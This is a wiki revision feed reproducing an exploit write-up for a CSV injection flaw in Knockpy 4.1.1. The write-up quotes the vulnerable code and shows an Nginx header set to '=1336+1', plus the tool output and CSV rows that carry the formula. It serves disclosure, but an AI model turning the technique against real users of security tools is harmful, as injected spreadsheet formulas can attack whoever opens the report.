https://pwnwiki.com/index.php?action=history&feed=atom&title=Knockpy_4.1.1_CSV%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E Knockpy 4.1.1 CSV注入漏洞 - Revision history 2026-04-21T01:19:38Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Knockpy_4.1.1_CSV%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=1304&oldid=prev Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Knockpy 4.1.1 - CSV Injection # Author: Dolev Farhi # Date: 2020-12-29 # Vendor Homepage: https://github.com/guelfoweb/knock # Version : 4.1.1 #..." 2021-04-09T08:48:35Z <p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Knockpy 4.1.1 - CSV Injection # Author: Dolev Farhi # Date: 2020-12-29 # Vendor Homepage: https://github.com/guelfoweb/knock # Version : 4.1.1 #...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: Knockpy 4.1.1 - CSV Injection<br /> # Author: Dolev Farhi<br /> # Date: 2020-12-29<br /> # Vendor Homepage: https://github.com/guelfoweb/knock<br /> # Version : 4.1.1<br /> # Tested on: Debian 9.13<br /> <br /> Knockpy, as part of its subdomain brute forcing flow of a remote domain, issues a HEAD request to the server to fetch details such as headers, status code, etc.<br /> The data then gets reflected when issuing the -c flag to store as a CSV file with the Server HTTP Response Header unfiltered.<br /> <br /> Vulnerable code segment(s)<br /> <br /> # knockpy.py<br /> <br /> # row = ip+'\t'+str(data['status'])+'\t'+'host'+'\t'+str(data['hostname'])+get_tab(data['hostname'])+str(server_type)<br /> # subdomain_csv_list.append(ip+','+str(data['status'])+','+'host'+','+str(data['hostname'])+','+str(server_type))<br /> <br /> # modules/save_report.py<br /> <br /> # if fields:<br /> # csv_report += 'ip,status,type,domain_name,server\n'<br /> # for item in report:<br /> # csv_report += item + '\n'<br /> # report = csv_report<br /> <br /> <br /> 1. Example malicious Nginx config to return CSV formula headers:<br /> <br /> http {<br /> ... <br /> server_tokens off;<br /> more_set_headers 'Server: =1336+1';<br /> ...<br /> }<br /> <br /> 2. Tester runs Knoockpy<br /> root@host:~/# python knockpy/knockpy.py -c test.local<br /> <br /> + checking for virustotal subdomains: SKIP<br /> VirusTotal API_KEY not found<br /> + checking for wildcard: NO<br /> + checking for zonetransfer: NO<br /> + resolving target: YES<br /> - scanning for subdomain...<br /> <br /> Ip Address Status Type Domain Name Server<br /> ---------- ------ ---- ----------- ------<br /> 127.0.0.1 200 host appserver.test.local =1336+1<br /> <br /> <br /> CSV result<br /> <br /> root@host:~/# cat test_local.csv<br /> 127.0.0.1,200,host,appserver.test.local,=1336+1<br /> 127.0.0.1,200,host,www.test.local,=1336+1<br /> &lt;/pre&gt;</div> Pwnwiki